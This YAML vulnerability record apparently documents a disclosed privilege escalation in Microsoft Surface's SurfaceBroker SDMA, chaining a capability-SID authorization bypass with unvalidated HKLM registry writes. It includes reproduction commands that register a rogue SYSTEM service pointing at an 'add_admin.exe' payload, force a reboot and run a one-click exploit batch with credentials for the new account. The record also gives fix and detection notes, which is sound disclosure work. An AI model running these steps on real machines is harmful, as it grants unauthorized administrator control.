# Vulnerability record. CWE-863 is "Incorrect Authorization"; the CVSS 3.1
# vector below scores 7.8 (High): local, low-complexity, low-privilege, no
# user interaction, full C/I/A impact in the same scope.
defect:
  product: "Microsoft Surface Device Management Architecture (SDMA)"
  vendor: "microsoft.com"
  type: os
  cwe: 863
  # Affected component versions, quoted so the dotted version strings are
  # never read as floats.
  versions:
    - "SurfaceBroker 6.92.139.0"
    - "RegistryDm 6.158.139.0"
    - "WmiDm 6.158.139.0"
    - "Microsoft.SurfaceHub 75.11130.117.0"
  presence: behavioural_deterministic
  os: "Windows 11 Pro build 26100 (Microsoft Surface Laptop 7th Edition)"
  cvss: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
  bugClass: access_control
  # Two independent authorization gaps (caller identity derived from
  # self-assignable capability SIDs; no key-path allowlist in RegistryDm)
  # chain into a local privilege escalation. Each is worth fixing on its own:
  # closing only the identity check still leaves any authorized caller able
  # to write arbitrary HKLM keys as SYSTEM.
  description: >
    Two compounding authorization failures in Microsoft SurfaceBroker SDMA
    allow a standard (non-administrator) local user to escalate to
    NT AUTHORITY\SYSTEM without UAC prompts or admin prerequisites.
    The RPC security callback authorizes callers based on self-assignable
    AppContainer capability SIDs rather than PackageFamilySid. The RegistryDm
    microservice writes to arbitrary HKLM registry keys as SYSTEM with no
    path-based authorization. Together, a standard user can create a Windows
    service in the registry that executes as SYSTEM on reboot.
  # First entry is the vendor case status; second is the public write-up.
  references:
    - "MSRC Case accepted 2026-02-18"
    - "https://thecontractor.io/surfacebroker-sdma-lpe/"

# Evidence items: each is given/when/then plus captured reproduction output.
# Items 1 and 2 are independent findings; item 3 is the chain combining them.
evidence:
  # Finding 1 — caller authorization keyed on AppContainer capability SIDs.
  # Capability SIDs in the S-1-15-3-1024-* form are chosen by whoever creates
  # the AppContainer profile, so matching them proves nothing about the
  # caller's identity; the description above names PackageFamilySid as the
  # intended discriminator.
  - title: "Authentication bypass via self-assignable AppContainer capability SIDs"
    given:
      - "Standard (non-admin) user session on a Microsoft Surface device"
      - "SurfaceExperienceService running as LocalSystem"
      - "RPC endpoint ncalrpc:[SurfaceBrokerRpc.v2] active"
    when:
      - "User creates an AppContainer profile with systemManagement and surfaceDiagnostics capability SIDs using CreateAppContainerProfile()"
      - "Child process spawned inside the AppContainer binds to the RPC endpoint"
      - "Child calls ProcessBrokerDataRequest with a well-formed protobuf envelope"
    then:
      - "RPC security callback inspects the token, finds both required capability SIDs, and grants ACCESS_LEVEL_USER"
      - "Standard user has authenticated to a SYSTEM-level broker service using self-assigned credentials"
    location:
      # NOTE(review): type says binary_offset but value is a descriptive label,
      # not an offset; item 2 uses type: function — align the schema.
      type: binary_offset
      value: "SurfaceBroker.exe — RPC security callback"
      context: "Security callback checks for capability SIDs S-1-15-3-1024-1023893147-235863880-425656572-4266519675-2590647553-3475379062-430000033-3360374247 (systemManagement) and S-1-15-3-1024-4255513387-3291848077-777312126-3061150041-664064000-1971711331-976518648-1617839858 (surfaceDiagnostics)"
    # Output is the captured run; "Return: 0" appears to be the broker
    # accepting the request from the AppContainer child.
    reproduction:
      commands:
        - "broker_client.exe appcontainer whoami"
        - "broker_client.exe appcontainer regget SOFTWARE\\Microsoft\\Surface\\Hub DeviceModel"
      output: |
        [+] Created new AppContainer profile
        [+] systemManagement capability SIDs:
            cap[0]: S-1-15-3-1024-1023893147-235863880-425656572-4266519675-2590647553-3475379062-430000033-3360374247
        [+] surfaceDiagnostics capability SIDs:
            cap[0]: S-1-15-3-1024-4255513387-3291848077-777312126-3061150041-664064000-1971711331-976518648-1617839858
        [+] IsAppContainer: YES
        [+] Return: 0 (0x00000000)
  - title: "Arbitrary HKLM write due to missing path validation in RegistryDm"
    # Finding 2 — the precondition is finding 1 (given[0]), but the missing
    # path check is a defect in its own right for any authorized caller.
    given:
      - "Authenticated session to SurfaceBroker (via AppContainer capability bypass)"
      - "RegistryDm microservice UUID d94e201c-708d-4f06-b9c7-95ae86e2c9a5 reachable"
    when:
      - "Caller sends SetLocalMachineRegistryRequest with verb UUID 6b11fece-74fd-4199-8645-64f352e73c51"
      - "Request contains registry key path SYSTEM\\CurrentControlSet\\Services\\SdmaLPE"
      - "Request contains ImagePath value pointing to attacker-controlled executable"
    then:
      - "RegistryDm writes the value to HKLM as SYSTEM without path validation"
      - "Registry key created under HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
      - "Standard user has created a Windows service definition that runs as LocalSystem"
    location:
      type: function
      value: "RegistryDm.exe — ProcessRequestInternalAsync → Registry.SetValue()"
      # Fix direction: allowlist the key paths this verb may write; the
      # Services hive should never be reachable through it.
      context: "No allowlist on key path. Caller-supplied path passed directly to Registry.SetValue() running as SYSTEM"
    # The regset/regsetdw calls populate the five values a service definition
    # needs; the reg query output is the verification step.
    # Detection angle: a new HKLM\SYSTEM\CurrentControlSet\Services subkey
    # written by RegistryDm.exe (as SYSTEM) rather than by the service
    # control manager would be a strong indicator of this abuse.
    reproduction:
      commands:
        - "broker_client.exe appcontainer regset SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ImagePath C:\\Users\\Public\\add_admin.exe"
        - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE Type 16"
        - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE Start 2"
        - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ErrorControl 0"
        - "broker_client.exe appcontainer regset SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ObjectName LocalSystem"
        - "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SdmaLPE"
        - "shutdown /r /t 0"
      output: |
        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SdmaLPE
            ImagePath    REG_SZ      C:\Users\Public\add_admin.exe
            Type         REG_DWORD   0x10
            Start        REG_DWORD   0x2
            ErrorControl REG_DWORD   0x0
            ObjectName   REG_SZ      LocalSystem

  # Finding 3 — end-to-end chain (finding 1 + finding 2 + reboot).
  - title: "Full chain — standard user to local administrator via SYSTEM service creation"
    given:
      - "Standard user session (SID S-1-5-21-*-1005, Medium integrity, no admin group)"
      - "add_admin.exe payload placed in C:\\Users\\Public\\"
      - "SurfaceExperienceService running"
    when:
      - "User runs sdma_one_click.bat (automates all 8 steps)"
      - "Batch file creates AppContainer, writes 5 registry values via RegistryDm, triggers reboot"
      - "On reboot, SCM starts the rogue service as SYSTEM"
    then:
      - "add_admin.exe executes as NT AUTHORITY\\SYSTEM"
      - "New local user created and added to Administrators group"
      - "Proof written to C:\\Users\\Public\\sdma_proof.txt"
      - "Standard user can now log in as local administrator"
    reproduction:
      # NOTE(review): the two batch arguments are presumably the user name
      # and password of the account the payload creates — treat this record
      # as sensitive when sharing the evidence package.
      commands:
        - "sdma_one_click.bat SdmaPoC SurfaceLPE!2026"
      # NOTE(review): hash holds the placeholder "evidence_package", not a
      # digest; record a SHA-256 per artifact so each file can be verified
      # against the package.
      files:
        - name: "broker_client.exe"
          hash: "evidence_package"
          type: "PE32+ executable"
        - name: "add_admin.exe"
          hash: "evidence_package"
          type: "PE32+ executable — SYSTEM service payload"
        - name: "sdma_one_click.bat"
          hash: "evidence_package"
          type: "Batch automation — 8-step exploit chain"
        - name: "boop.2.mp4"
          hash: "evidence_package"
          type: "Video evidence — exploitation recording"
        - name: "yooo1.mp4"
          hash: "evidence_package"
          type: "Video evidence — exploitation recording"
